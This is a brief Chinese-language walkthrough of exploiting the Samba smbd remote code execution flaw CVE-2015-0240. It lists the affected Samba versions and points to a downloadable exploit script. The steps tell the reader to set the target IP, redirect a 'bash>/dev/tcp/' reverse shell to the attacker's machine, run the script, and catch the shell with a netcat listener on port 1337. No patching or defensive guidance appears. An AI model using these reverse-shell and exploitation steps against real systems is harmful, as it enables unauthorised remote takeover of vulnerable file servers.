(CVE-2015-0240)Samba远程代码执行

简介

 

Samba 是利用 SMB 协议实现文件共享的一款著名开源工具套件。日前 Samba 曝出一个严重安全漏洞，该漏洞出现在 smbd 文件服务端，漏洞编号为 CVE-2015-0240，可以允许攻击者远程远程执行恶意代码。

 

作为一款老牌系统工具，Samba 的使用率非常高，更是作为很多 *BSD 和苹果 OS X操作系统的组件存在，因此影响面非常大。Samba 支持的操作系统包括 Windows 95/98/NT，OS/2 和Linux。

 

受影响的产品

 

Samba 3.5.x 全版本
Samba 3.6.x 到 Samba 3.6.25 之前的版本
Samba 4.0.x 到 Samba 4.0.25 之前的版本
Samba 4.1.x 到 Samba 4.1.17 之前的版本
Samba 4.2.x 到 Samba 4.2.0rc5 之前的版本

 

脚本下载

samba.py

 

漏洞利用

第一步：编辑samba.py 文件，编辑21行，将host改为目标靶机地址，

再将后面的 bash>/dev/tcp/127.0.0.1 的ip地址修改为攻击机的ip

 

 

 

 

 

 

 

 

第二步：poc脚本将会利用溢出的RCE漏洞运行该命令

使用命令python samba-exploit.py运行poc脚本

 

使用命令nc -lvvp 1337监听本地1337端口，并显示指令执行过程